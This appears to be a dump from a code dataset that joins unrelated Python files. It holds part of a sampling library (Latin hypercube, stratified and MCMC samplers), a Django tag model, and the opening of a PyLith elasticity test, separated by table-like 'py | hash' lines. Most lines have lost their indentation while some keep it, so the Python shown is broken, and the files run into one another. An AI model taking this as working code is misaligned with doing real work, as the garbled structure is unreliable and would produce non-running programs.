"Supported distributions: 'Uniform', 'Normal', 'Lognormal', 'Weibull', "
"'Beta', 'Exponential', 'Gamma'.")
if self.pdf_params is None:
raise NotImplementedError("Exit code: Distribution parameters not defined.")
if self.dimension is None:
if len(self.pdf_type) != len(self.pdf_params):
raise NotImplementedError("Exit code: Incompatible dimensions.")
else:
self.dimension = len(self.pdf_type)
else:
import itertools
from itertools import chain
if len(self.pdf_type) == 1 and len(self.pdf_params) == self.dimension:
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == self.dimension:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == 1:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_type) != len(self.pdf_params):
raise NotImplementedError("Exit code: Incompatible dimensions.")
if self.lhs_criterion is None:
self.lhs_criterion = 'random'
else:
if self.lhs_criterion not in ['random', 'centered', 'maximin', 'correlate']:
raise NotImplementedError("Exit code: Supported lhs criteria: 'random', 'centered', 'maximin', "
"'correlate'")
if self.lhs_metric is None:
self.lhs_metric = 'euclidean'
else:
if self.lhs_metric not in ['braycurtis', 'canberra', 'chebyshev', 'cityblock', 'correlation', 'cosine',
'dice', 'euclidean', 'hamming', 'jaccard', 'kulsinski', 'mahalanobis',
'matching', 'minkowski', 'rogerstanimoto', 'russellrao', 'seuclidean',
'sokalmichener', 'sokalsneath', 'sqeuclidean']:
raise NotImplementedError("Exit code: Supported lhs distances: 'braycurtis', 'canberra', 'chebyshev', "
"'cityblock',"
" 'correlation', 'cosine','dice', 'euclidean', 'hamming', 'jaccard', "
"'kulsinski', 'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto',"
"'russellrao', 'seuclidean','sokalmichener', 'sokalsneath', 'sqeuclidean'")
if self.lhs_iter is None or self.lhs_iter == 0:
self.lhs_iter = 1000
elif self.lhs_iter is not None:
self.lhs_iter = int(self.lhs_iter)
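# Usage sketch (illustrative, not part of the original module): a maximin design
# on 20 points. Distribution parameter conventions follow the MCS sketch above.
def _example_lhs():
    lhs = LHS(dimension=2, pdf_type=['Uniform', 'Uniform'],
              pdf_params=[[0, 1], [0, 1]], nsamples=20,
              lhs_criterion='maximin', lhs_metric='euclidean', lhs_iter=100)
    return lhs.samples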
########################################################################################################################
########################################################################################################################
# Partially Stratified Sampling (PSS)
########################################################################################################################
class PSS:
"""
This class generates a partially stratified sample set on U(0,1) as described in:
Shields, M.D. and Zhang, J. "The generalization of Latin hypercube sampling" Reliability Engineering and
System Safety. 148: 96-108
:param pss_design: Vector defining the subdomains to be used.
Example: 5D problem with 2x2D + 1x1D subdomains using pss_design = [2,2,1]. \n
Note: The sum of the values in the pss_design vector equals the dimension of the problem.
:param pss_strata: Vector defining how each dimension should be stratified.
Example: 5D problem with 2x2D + 1x1D subdomains with 625 samples using
                        pss_strata = [25,25,625].\n
                        Note: pss_strata[i]^pss_design[i] = number of samples (for all i)
:return: pss_samples: Generated samples Array (nSamples x nRVs)
:type pss_design: list
:type pss_strata: list
Created by: Jiaxin Zhang
Last modified: 24/01/2018 by D.G. Giovanis
"""
# TODO: Jiaxin - Add documentation to this subclass
# TODO: the pss_design = [[1,4], [2,5], [3]] - then reorder the sequence of RVs
# TODO: Add the sample check and pss_design check in the beginning
# TODO: Create a list that contains all element info - parent structure
def __init__(self, dimension=None, pdf_type=None, pdf_params=None, pss_design=None, pss_strata=None):
self.pdf_type = pdf_type
self.pdf_params = pdf_params
self.pss_design = pss_design
self.pss_strata = pss_strata
self.dimension = dimension
self.init_pss()
self.nsamples = self.pss_strata[0] ** self.pss_design[0]
self.samplesU01, self.samples = self.run_pss()
def run_pss(self):
samples = np.zeros((self.nsamples, self.dimension))
samples_u_to_x = np.zeros((self.nsamples, self.dimension))
col = 0
for i in range(len(self.pss_design)):
n_stratum = self.pss_strata[i] * np.ones(self.pss_design[i], dtype=np.int)
sts = STS(pdf_type=self.pdf_type, pdf_params=self.pdf_params, sts_design=n_stratum, pss_=True)
index = list(range(col, col + self.pss_design[i]))
samples[:, index] = sts.samplesU01
samples_u_to_x[:, index] = sts.samples
arr = np.arange(self.nsamples).reshape((self.nsamples, 1))
samples[:, index] = samples[np.random.permutation(arr), index]
samples_u_to_x[:, index] = samples_u_to_x[np.random.permutation(arr), index]
col = col + self.pss_design[i]
return samples, samples_u_to_x
################################################################################################################
# Partially Stratified sampling (PSS) checks.
# Necessary parameters: 1. pdf, 2. pdf parameters 3. pss design 4. pss strata
# Optional:
def init_pss(self):
if self.pdf_type is None:
raise NotImplementedError("Exit code: Distribution not defined.")
else:
for i in self.pdf_type:
if i not in ['Uniform', 'Normal', 'Lognormal', 'Weibull', 'Beta', 'Exponential', 'Gamma']:
raise NotImplementedError("Exit code: Unrecognized type of distribution."
"Supported distributions: 'Uniform', 'Normal', 'Lognormal', 'Weibull', "
"'Beta', 'Exponential', 'Gamma'. ")
if self.pdf_params is None:
raise NotImplementedError("Exit code: Distribution parameters not defined.")
if self.pss_design is None:
raise NotImplementedError("Exit code: pss design not defined.")
elif self.pss_strata is None:
raise NotImplementedError("Exit code: pss strata not defined.")
else:
if len(self.pss_design) != len(self.pss_strata):
raise ValueError('Exit code: "pss design" and "pss strata" must be the same length.')
sample_check = np.zeros((len(self.pss_strata), len(self.pss_design)))
for i in range(len(self.pss_strata)):
for j in range(len(self.pss_design)):
sample_check[i, j] = self.pss_strata[i] ** self.pss_design[j]
if np.max(sample_check) != np.min(sample_check):
raise ValueError('Exit code: All dimensions must have the same number of samples/strata.')
if self.dimension is None:
self.dimension = np.sum(self.pss_design)
else:
if self.dimension != np.sum(self.pss_design):
raise NotImplementedError("Exit code: Incompatible dimensions.")
import itertools
from itertools import chain
if len(self.pdf_type) == 1 and len(self.pdf_params) == self.dimension:
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == self.dimension:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == 1:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_type) != len(self.pdf_params):
raise NotImplementedError("Exit code: Incompatible dimensions.")
########################################################################################################################
########################################################################################################################
# Stratified Sampling (sts)
########################################################################################################################
class STS:
# TODO: MDS - Add documentation to this subclass
"""
:param dimension:
:param pdf_type:
:param pdf_params:
:param sts_design:
:param pss_:
"""
def __init__(self, dimension=None, pdf_type=None, pdf_params=None, sts_design=None, pss_=None):
self.dimension = dimension
self.pdf_type = pdf_type
self.pdf_params = pdf_params
self.sts_design = sts_design
if pss_ is None:
self.init_sts()
strata = Strata(nstrata=self.sts_design)
self.origins = strata.origins
self.widths = strata.widths
self.weights = strata.weights
self.samplesU01, self.samples = self.run_sts()
def run_sts(self):
samples = np.empty([self.origins.shape[0], self.origins.shape[1]], dtype=np.float32)
for i in range(0, self.origins.shape[0]):
for j in range(0, self.origins.shape[1]):
samples[i, j] = np.random.uniform(self.origins[i, j], self.origins[i, j] + self.widths[i, j])
samples_u_to_x = inv_cdf(samples, self.pdf_type, self.pdf_params)
return samples, samples_u_to_x
def init_sts(self):
if self.pdf_type is None:
raise NotImplementedError("Exit code: Distribution not defined.")
else:
for i in self.pdf_type:
if i not in ['Uniform', 'Normal', 'Lognormal', 'Weibull', 'Beta', 'Exponential', 'Gamma']:
raise NotImplementedError("Exit code: Unrecognized type of distribution."
"Supported distributions: 'Uniform', 'Normal', 'Lognormal', 'Weibull', "
"'Beta', 'Exponential', 'Gamma'. ")
if self.pdf_params is None:
raise NotImplementedError("Exit code: Distribution parameters not defined.")
if self.sts_design is None:
raise NotImplementedError("Exit code: sts design not defined.")
if self.dimension is None:
self.dimension = len(self.sts_design)
else:
if self.dimension != len(self.sts_design):
raise NotImplementedError("Exit code: Incompatible dimensions.")
import itertools
from itertools import chain
if len(self.pdf_type) == 1 and len(self.pdf_params) == self.dimension:
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == self.dimension:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == 1:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_type) != len(self.pdf_params):
raise NotImplementedError("Exit code: Incompatible dimensions.")
# TODO: Create a list that contains all element info - parent structure
# e.g. SS_samples = [STS[j] for j in range(0,nsamples)]
# hstack
########################################################################################################################
########################################################################################################################
# Class Strata
########################################################################################################################
class Strata:
"""
Define a rectilinear stratification of the n-dimensional unit hypercube with N strata.
:param nstrata: array-like
An array of dimension 1 x n defining the number of strata in each of the n dimensions
Creates an equal stratification with strata widths equal to 1/nstrata
The total number of strata, N, is the product of the terms of nstrata
Example -
nstrata = [2, 3, 2] creates a 3d stratification with:
2 strata in dimension 0 with stratum widths 1/2
3 strata in dimension 1 with stratum widths 1/3
2 strata in dimension 2 with stratum widths 1/2
:param input_file: string
File path to input file specifying stratum origins and stratum widths
:param origins: array-like
An array of dimension N x n specifying the origins of all strata
The origins of the strata are the coordinates of the stratum orthotope nearest the global origin
Example - A 2D stratification with 2 strata in each dimension
origins = [[0, 0]
[0, 0.5]
[0.5, 0]
[0.5, 0.5]]
:param widths: array-like
An array of dimension N x n specifying the widths of all strata in each dimension
Example - A 2D stratification with 2 strata in each dimension
widths = [[0.5, 0.5]
[0.5, 0.5]
[0.5, 0.5]
[0.5, 0.5]]
"""
def __init__(self, nstrata=None, input_file=None, origins=None, widths=None):
"""
Class defines a rectilinear stratification of the n-dimensional unit hypercube with N strata
:param nstrata: array-like
An array of dimension 1 x n defining the number of strata in each of the n dimensions
Creates an equal stratification with strata widths equal to 1/nstrata
The total number of strata, N, is the product of the terms of nstrata
Example -
nstrata = [2, 3, 2] creates a 3d stratification with:
2 strata in dimension 0 with stratum widths 1/2
3 strata in dimension 1 with stratum widths 1/3
2 strata in dimension 2 with stratum widths 1/2
:param input_file: string
File path to input file specifying stratum origins and stratum widths
See documentation ######## for input file format
:param origins: array-like
An array of dimension N x n specifying the origins of all strata
The origins of the strata are the coordinates of the stratum orthotope nearest the global origin
Example - A 2D stratification with 2 strata in each dimension
origins = [[0, 0]
[0, 0.5]
[0.5, 0]
[0.5, 0.5]]
:param widths: array-like
An array of dimension N x n specifying the widths of all strata in each dimension
Example - A 2D stratification with 2 strata in each dimension
widths = [[0.5, 0.5]
[0.5, 0.5]
[0.5, 0.5]
[0.5, 0.5]]
Created by: Michael D. Shields
Last modified: 11/4/2017
Last modified by: Michael D. Shields
"""
self.input_file = input_file
self.nstrata = nstrata
self.origins = origins
self.widths = widths
if self.nstrata is None:
if self.input_file is None:
if self.widths is None or self.origins is None:
sys.exit('Error: The strata are not fully defined. Must provide [nstrata], '
'input file, or [origins] and [widths]')
else:
# Read the strata from the specified input file
# See documentation for input file formatting
array_tmp = np.loadtxt(input_file)
self.origins = array_tmp[:, 0:array_tmp.shape[1] // 2]
                self.widths = array_tmp[:, array_tmp.shape[1] // 2:]
                # Check to see that the strata are space-filling
                space_fill = np.sum(np.prod(self.widths, 1))
if 1 - space_fill > 1e-5:
sys.exit('Error: The stratum design is not space-filling.')
if 1 - space_fill < -1e-5:
sys.exit('Error: The stratum design is over-filling.')
# TODO: MDS - Add a check for disjointness of strata
# Check to see that the strata are disjoint
# ncorners = 2**self.strata.shape[1]
# for i in range(0,len(self.strata)):
# for j in range(0,ncorners):
else:
# Use nstrata to assign the origin and widths of a specified rectilinear stratification.
self.origins = np.divide(self.fullfact(self.nstrata), self.nstrata)
self.widths = np.divide(np.ones(self.origins.shape), self.nstrata)
self.weights = np.prod(self.widths, axis=1)
def fullfact(self, levels):
# TODO: MDS - Acknowledge the source here.
"""
Create a general full-factorial design
Parameters
----------
levels : array-like
An array of integers that indicate the number of levels of each input
design factor.
Returns
-------
mat : 2d-array
The design matrix with coded levels 0 to k-1 for a k-level factor
Example
-------
::
>>> fullfact([2, 4, 3])
array([[ 0., 0., 0.],
[ 1., 0., 0.],
[ 0., 1., 0.],
[ 1., 1., 0.],
[ 0., 2., 0.],
[ 1., 2., 0.],
[ 0., 3., 0.],
[ 1., 3., 0.],
[ 0., 0., 1.],
[ 1., 0., 1.],
[ 0., 1., 1.],
[ 1., 1., 1.],
[ 0., 2., 1.],
[ 1., 2., 1.],
[ 0., 3., 1.],
[ 1., 3., 1.],
[ 0., 0., 2.],
[ 1., 0., 2.],
[ 0., 1., 2.],
[ 1., 1., 2.],
[ 0., 2., 2.],
[ 1., 2., 2.],
[ 0., 3., 2.],
[ 1., 3., 2.]])
"""
n = len(levels) # number of factors
nb_lines = np.prod(levels) # number of trial conditions
H = np.zeros((nb_lines, n))
level_repeat = 1
range_repeat = np.prod(levels)
for i in range(n):
range_repeat //= levels[i]
lvl = []
for j in range(levels[i]):
lvl += [j] * level_repeat
rng = lvl * range_repeat
level_repeat *= levels[i]
H[:, i] = rng
return H
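# Hedged usage sketch (added for illustration, not in the original source): the 2D stratification from the Strata
# docstring, with two strata per dimension.
#
# strata = Strata(nstrata=[2, 2])
# print(strata.origins)   # rows (in fullfact order): [0, 0], [0.5, 0], [0, 0.5], [0.5, 0.5]
# print(strata.widths)    # every entry is 0.5
# print(strata.weights)   # every stratum weight is 0.25, so they sum to 1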
########################################################################################################################
########################################################################################################################
# Markov Chain Monte Carlo (MCMC)
########################################################################################################################
class MCMC:
"""Generate samples from an arbitrary probability density function using Markov Chain Monte Carlo.
This class generates samples from an arbitrary user-specified distribution using Metropolis-Hastings(MH),
    Modified Metropolis-Hastings, or Affine Invariant Ensemble Sampler with stretch moves.
References:
S.-K. Au and J. L. Beck, “Estimation of small failure probabilities in high dimensions by subset simulation,”
Probabilistic Eng. Mech., vol. 16, no. 4, pp. 263–277, Oct. 2001.
J. Goodman and J. Weare, “Ensemble samplers with affine invariance,” Commun. Appl. Math. Comput. Sci., vol. 5,
no. 1, pp. 65–80, 2010.
Input:
:param dimension: A scalar value defining the dimension of target density function.
Default: 1
:type dimension: int
:param pdf_proposal_type: Type of proposal density function for MCMC. Only used with algorithm = 'MH' or 'MMH'
Options:
'Normal' : Normal proposal density
'Uniform' : Uniform proposal density
Default: 'Uniform'
If dimension > 1 and algorithm = 'MMH', this may be input as a list to assign different proposal
densities to each dimension. Example pdf_proposal_type = ['Normal','Uniform'].
If dimension > 1, algorithm = 'MMH' and this is input as a string, the proposal densities for all
dimensions are set equal to the assigned proposal type.
:type pdf_proposal_type: str or str list
:param pdf_proposal_scale: Scale of the proposal distribution
If algorithm == 'MH' or 'MMH'
For pdf_proposal_type = 'Uniform'
Proposal is Uniform in [x-pdf_proposal_scale/2, x+pdf_proposal_scale/2]
For pdf_proposal_type = 'Normal'
Proposal is Normal with standard deviation equal to pdf_proposal_scale
If algorithm == 'Stretch'
pdf_proposal_scale sets the scale of the stretch density
g(z) = 1/sqrt(z) for z in [1/pdf_proposal_scale, pdf_proposal_scale]
Default value: dimension x 1 list of ones
:type pdf_proposal_scale: float or float list
If dimension > 1, this may be defined as float or float list
If input as float, pdf_proposal_scale is assigned to all dimensions
If input as float list, each element is assigned to the corresponding dimension
:param pdf_target_type: Type of target density function for acceptance/rejection in MMH. Not used for MH or Stretch.
Options:
'marginal_pdf': Check acceptance/rejection for a candidate in MMH using the marginal pdf
For independent variables only
'joint_pdf': Check acceptance/rejection for a candidate in MMH using the joint pdf
Default: 'marginal_pdf'
:type pdf_target_type: str
:param pdf_target: Target density function from which to draw random samples
The target joint probability density must be a function, or list of functions, or a string.
If type == 'str'
The assigned string must refer to a custom pdf defined in the file custom_pdf.py in the working
directory
If type == function
The function must be defined in the python script calling MCMC
If dimension > 1 and pdf_target_type='marginal_pdf', the input to pdf_target is a list of size
[dimensions x 1] where each item of the list defines a marginal pdf.
Default: Multivariate normal distribution having zero mean and unit standard deviation
:type pdf_target: function, function list, or str
:param pdf_target_params: Parameters of the target pdf
:type pdf_target_params: list
:param algorithm: Algorithm used to generate random samples.
Options:
'MH': Metropolis Hastings Algorithm
'MMH': Component-wise Modified Metropolis Hastings Algorithm
'Stretch': Affine Invariant Ensemble MCMC with stretch moves
Default: 'MMH'
:type algorithm: str
:param jump: Number of samples between accepted states of the Markov chain.
Default value: 1 (Accepts every state)
    :type jump: int
:param nsamples: Number of samples to generate
No Default Value: nsamples must be prescribed
:type nsamples: int
:param seed: Seed of the Markov chain(s)
For 'MH' and 'MMH', this is a single point, defined as a numpy array of dimension (1 x dimension)
For 'Stretch', this is a numpy array of dimension N x dimension, where N is the ensemble size
Default:
For 'MH' and 'MMH': zeros(1 x dimension)
For 'Stretch': No default, this must be specified.
:type seed: float or numpy array
:param nburn: Length of burn-in. Number of samples at the beginning of the chain to discard.
This option is only used for the 'MMH' and 'MH' algorithms.
Default: nburn = 0
:type nburn: int
Output:
:return: MCMC.samples:
:rtype: MCMC.samples: numpy array
"""
# Authors: Mohit Chauhan, Dimitris Giovanis, Michael D. Shields
# Updated: 4/26/18 by Michael D. Shields
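    # Hedged usage sketch (illustrative only, not part of the original class): component-wise MMH on a 1D standard
    # normal, relying on the default marginal target described above. The argument values below are assumptions,
    # not verified defaults.
    #
    #   mcmc = MCMC(dimension=1, algorithm='MMH', pdf_proposal_type='Normal', pdf_proposal_scale=1, nsamples=500)
    #   print(mcmc.samples.shape)   # expected: (500, 1)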
def __init__(self, dimension=None, pdf_proposal_type=None, pdf_proposal_scale=None, pdf_target_type=None,
pdf_target=None, pdf_target_params=None, algorithm=None, jump=None, nsamples=None, seed=None,
nburn=None):
self.pdf_proposal_type = pdf_proposal_type
self.pdf_proposal_scale = pdf_proposal_scale
self.pdf_target_type = pdf_target_type
self.pdf_target = pdf_target
self.pdf_target_params = pdf_target_params
self.algorithm = algorithm
self.jump = jump
self.nsamples = nsamples
self.dimension = dimension
self.seed = seed
self.nburn = nburn
self.init_mcmc()
        if self.algorithm == 'Stretch':
self.ensemble_size = len(self.seed)
self.samples = self.run_mcmc()
def run_mcmc(self):
rejects = 0
# Defining an array to store the generated samples
        samples = np.zeros([self.nsamples * self.jump + self.nburn, self.dimension])
################################################################################################################
# Classical Metropolis-Hastings Algorithm with symmetric proposal density
if self.algorithm == 'MH':
from numpy.random import normal, multivariate_normal, uniform
samples[0, :] = self.seed
pdf_ = self.pdf_target[0]
for i in range(self.nsamples * self.jump - 1 + self.nburn):
if self.pdf_proposal_type[0] == 'Normal':
if self.dimension == 1:
candidate = normal(samples[i, :], np.array(self.pdf_proposal_scale))
else:
if i == 0:
self.pdf_proposal_scale = np.diag(np.array(self.pdf_proposal_scale))
candidate = multivariate_normal(samples[i, :], np.array(self.pdf_proposal_scale))
                elif self.pdf_proposal_type[0] == 'Uniform':
candidate = uniform(low=samples[i, :] - np.array(self.pdf_proposal_scale) / 2,
high=samples[i, :] + np.array(self.pdf_proposal_scale) / 2,
size=self.dimension)
p_proposal = pdf_(candidate, self.pdf_target_params)
p_current = pdf_(samples[i, :], self.pdf_target_params)
p_accept = p_proposal / p_current
accept = np.random.random() < p_accept
if accept:
samples[i + 1, :] = candidate
else:
samples[i + 1, :] = samples[i, :]
rejects += 1
################################################################################################################
# Modified Metropolis-Hastings Algorithm with symmetric proposal density
elif self.algorithm == 'MMH':
samples[0, :] = self.seed[0:]
if self.pdf_target_type == 'marginal_pdf':
for i in range(self.nsamples * self.jump - 1 + self.nburn):
for j in range(self.dimension):
pdf_ = self.pdf_target[j]
if self.pdf_proposal_type[j] == 'Normal':
candidate = np.random.normal(samples[i, j], self.pdf_proposal_scale[j])
elif self.pdf_proposal_type[j] == 'Uniform':
candidate = np.random.uniform(low=samples[i, j] - self.pdf_proposal_scale[j] / 2,
high=samples[i, j] + self.pdf_proposal_scale[j] / 2, size=1)
p_proposal = pdf_(candidate, self.pdf_target_params)
p_current = pdf_(samples[i, j], self.pdf_target_params)
p_accept = p_proposal / p_current
accept = np.random.random() < p_accept
if accept:
samples[i + 1, j] = candidate
else:
samples[i + 1, j] = samples[i, j]
elif self.pdf_target_type == 'joint_pdf':
pdf_ = self.pdf_target[0]
for i in range(self.nsamples * self.jump - 1 + self.nburn):
candidate = list(samples[i, :])
current = list(samples[i, :])
for j in range(self.dimension):
if self.pdf_proposal_type[j] == 'Normal':
candidate[j] = np.random.normal(samples[i, j], self.pdf_proposal_scale[j])
elif self.pdf_proposal_type[j] == 'Uniform':
candidate[j] = np.random.uniform(low=samples[i, j] - self.pdf_proposal_scale[j] / 2,
high=samples[i, j] + self.pdf_proposal_scale[j] / 2,
size=1)
p_proposal = pdf_(candidate, self.pdf_target_params)
p_current = pdf_(current, self.pdf_target_params)
p_accept = p_proposal / p_current
accept = np.random.random() < p_accept
if accept:
current[j] = candidate[j]
else:
candidate[j] = current[j]
samples[i + 1, :] = current
################################################################################################################
# Affine Invariant Ensemble Sampler with stretch moves
# Reference: Goodman, J. and Weare, J., (2010) "Ensemble samplers with affine invariance." Communications in
# applied mathematics and computational science. 5: 65-80.
elif self.algorithm == 'Stretch':
samples[0:self.ensemble_size, :] = self.seed
pdf_ = self.pdf_target[0]
for i in range(self.ensemble_size-1,self.nsamples * self.jump - 1):
complementary_ensemble = samples[i-self.ensemble_size+2:i+1,:]
S = random.choice(complementary_ensemble)
s = (1+(self.pdf_proposal_scale[0]-1)*random.random())**2/self.pdf_proposal_scale[0]
candidate = S+s*(samples[i-self.ensemble_size+1,:]-S)
p_proposal = pdf_(candidate, self.pdf_target_params)
p_current = pdf_(samples[i-self.ensemble_size+1, :], self.pdf_target_params)
p_accept = s**(self.dimension-1)*p_proposal/p_current
accept = np.random.random() < p_accept
if accept:
samples[i + 1, :] = candidate
else:
samples[i + 1, :] = samples[i-self.ensemble_size+1, :]
################################################################################################################
# Return the samples
        if self.algorithm == 'MMH' or self.algorithm == 'MH':
            return samples[self.nburn:self.nsamples * self.jump + self.nburn:self.jump]
else:
output = np.zeros((self.nsamples,self.dimension))
j = 0
for i in range(self.jump*self.ensemble_size-self.ensemble_size, samples.shape[0],
self.jump*self.ensemble_size):
output[j:j+self.ensemble_size,:] = samples[i:i+self.ensemble_size,:]
j = j+self.ensemble_size
return output
# TODO: Add Gibbs Sampler
# TODO: Add Affine Invariant with walk moves
####################################################################################################################
# Check to ensure consistency of the user input and assign defaults
def init_mcmc(self):
if self.dimension is None:
self.dimension = 1
# Check nsamples
if self.nsamples is None:
raise NotImplementedError('Exit code: Number of samples not defined.')
# Check seed
if self.seed is None:
self.seed = np.zeros(self.dimension)
        if self.algorithm != 'Stretch':
if self.seed.__len__() != self.dimension:
raise NotImplementedError("Exit code: Incompatible dimensions in 'seed'.")
else:
if self.seed.shape[0] < 3:
raise NotImplementedError("Exit code: Ensemble size must be > 2.")
# Check jump
if self.jump is None:
self.jump = 1
# Check pdf_proposal_type
if self.pdf_proposal_type is None:
self.pdf_proposal_type = 'Uniform'
# If pdf_proposal_type is entered as a string, make it a list
        if type(self.pdf_proposal_type).__name__ == 'str':
self.pdf_proposal_type = [self.pdf_proposal_type]
for i in self.pdf_proposal_type:
if i not in ['Uniform', 'Normal']:
raise ValueError('Exit code: Unrecognized type for proposal distribution. Supported distributions: '
'Uniform, '
'Normal.')
        if self.algorithm == 'MH' and len(self.pdf_proposal_type) != 1:
            raise ValueError('Exit code: MH algorithm can only take one proposal distribution.')
        elif len(self.pdf_proposal_type) != self.dimension:
if len(self.pdf_proposal_type) == 1:
self.pdf_proposal_type = self.pdf_proposal_type * self.dimension
else:
raise NotImplementedError("Exit code: Incompatible dimensions in 'pdf_proposal_type'.")
# Check pdf_proposal_scale
if self.pdf_proposal_scale is None:
if self.algorithm == 'Stretch':
self.pdf_proposal_scale = 2
else:
self.pdf_proposal_scale = 1
if type(self.pdf_proposal_scale).__name__ != 'list':
self.pdf_proposal_scale = [self.pdf_proposal_scale]
if len(self.pdf_proposal_scale) != self.dimension:
if len(self.pdf_proposal_scale) == 1:
self.pdf_proposal_scale = self.pdf_proposal_scale * self.dimension
else:
raise NotImplementedError("Exit code: Incompatible dimensions in 'pdf_proposal_scale'.")
# Check pdf_target_type
        if self.algorithm == 'MMH' and self.pdf_target_type is None:
            self.pdf_target_type = 'marginal_pdf'
        if self.algorithm == 'Stretch':
self.pdf_target_type = 'joint_pdf'
if self.pdf_target_type not in ['joint_pdf', 'marginal_pdf']:
raise ValueError('Exit code: Unrecognized type for target distribution. Supported distributions: '
'joint_pdf, '
'marginal_pdf.')
# Check algorithm
if self.algorithm is None:
self.algorithm = 'MMH'
else:
if self.algorithm not in ['MH', 'MMH', 'Stretch']:
raise NotImplementedError('Exit code: Unrecognized MCMC algorithm. Supported algorithms: '
'Metropolis-Hastings (MH), '
'Modified Metropolis-Hastings (MMH), '
'Affine Invariant Ensemble with Stretch Moves (Stretch).')
# Check pdf_target
if type(self.pdf_target).__name__ == 'str':
self.pdf_target = pdf(self.pdf_target)
        if self.pdf_target is None and self.algorithm == 'MMH':
            if self.dimension == 1 or self.pdf_target_type == 'marginal_pdf':
def target(x, dummy):
return sp.norm.pdf(x)
if self.dimension == 1:
self.pdf_target = [target]
else:
self.pdf_target = [target] * self.dimension
else:
def target(x, dummy):
return sp.multivariate_normal.pdf(x,mean=np.zeros(self.dimension),cov=np.eye(self.dimension))
self.pdf_target = [target]
elif self.pdf_target is None:
if self.dimension == 1:
def target(x, dummy):
return sp.norm.pdf(x)
self.pdf_target = [target]
else:
def target(x, dummy):
return sp.multivariate_normal.pdf(x,mean=np.zeros(self.dimension),cov=np.eye(self.dimension))
self.pdf_target = [target]
elif type(self.pdf_target).__name__ != 'list':
self.pdf_target = [self.pdf_target]
# Check pdf_target_params
if self.pdf_target_params is None:
self.pdf_target_params = []
if type(self.pdf_target_params).__name__!='list':
self.pdf_target_params = [self.pdf_target_params]
if self.nburn is None:
self.nburn = 0
########################################################################################################################
########################################################################################################################
# ADD ANY NEW METHOD HERE
######################################################################################################################## |
py | 1a34580253aa0fb091defa7e1d8572b5dfb3e6cc | from django.db import models
from django.contrib.auth.models import User as AuthUser
from _commons.fields import ColorField
from .helpers import *
from .settings import *
# List: lists available tags
class List(models.Model):
"""
Database [tag.list]
"""
name = models.CharField(db_index=True, max_length=TAG_NAME_MAX_LENGTH)
description = models.CharField(max_length=TAG_DESC_MAX_LENGTH, default='')
slug = models.CharField(db_index=True, max_length=TAG_SLUG_MAX_LENGTH)
color = ColorField(blank=True)
author = models.ForeignKey(AuthUser)
date = models.DateTimeField(auto_now_add=True)
picture_original = models.FileField(upload_to=TagHelper.get_picture_path_original)
picture_small = models.FileField(upload_to=TagHelper.get_picture_path_small)
picture_normal = models.FileField(upload_to=TagHelper.get_picture_path_normal)
picture_large = models.FileField(upload_to=TagHelper.get_picture_path_large)
def __unicode__(self):
return u'%s' % (self.name)
def url_picture_original(self):
return TagHelper.get_picture_absolute_url(
self.picture_original or DEFAULT_PICTURE_PATH['original']
)
def url_picture_small(self):
return TagHelper.get_picture_absolute_url(
self.picture_small or DEFAULT_PICTURE_PATH['small']
)
def url_picture_normal(self):
return TagHelper.get_picture_absolute_url(
self.picture_normal or DEFAULT_PICTURE_PATH['normal']
)
def url_picture_large(self):
return TagHelper.get_picture_absolute_url(
self.picture_large or DEFAULT_PICTURE_PATH['large']
)
|
py | 1a3459dd64ad9f2bf92987e0305a34fab6b2e3cc | #!/usr/bin/env python
#
# ----------------------------------------------------------------------
#
# Brad T. Aagaard, U.S. Geological Survey
# Charles A. Williams, GNS Science
# Matthew G. Knepley, University of Chicago
#
# This code was developed as part of the Computational Infrastructure
# for Geodynamics (http://geodynamics.org).
#
# Copyright (c) 2010-2017 University of California, Davis
#
# See COPYING for license information.
#
# ----------------------------------------------------------------------
#
## @file tests/2d/quad4/slipweakening_compression_soln.py
##
## @brief Analytical solution to compression problem with slipweakening.
import numpy
# Physical properties
p_density = 2500.0
p_vs = 3000.0
p_vp = 5291.502622129181
p_mu = p_density*p_vs**2
p_lambda = p_density*p_vp**2 - 2*p_mu
# Uniform stress field (plane strain)
sxx = 0.0
sxy = 1.0e+6
syy = 0.0
szz = p_lambda/(2*p_lambda+2*p_mu)*(sxx+syy)
# Uniform strain field
exx = 1.0/(2*p_mu) * (sxx - p_lambda/(3*p_lambda+2*p_mu) * (sxx+syy+szz))
eyy = 1.0/(2*p_mu) * (syy - p_lambda/(3*p_lambda+2*p_mu) * (sxx+syy+szz))
ezz = 1.0/(2*p_mu) * (szz - p_lambda/(3*p_lambda+2*p_mu) * (sxx+syy+szz))
exy = 1.0/(2*p_mu) * (sxy)
#print exx,eyy,exy,ezz,szz
#print -exx*p_lambda/(p_lambda+2*p_mu)
# ----------------------------------------------------------------------
class AnalyticalSoln(object):
"""
Analytical solution to slipweakening_compression problem.
"""
def __init__(self):
return
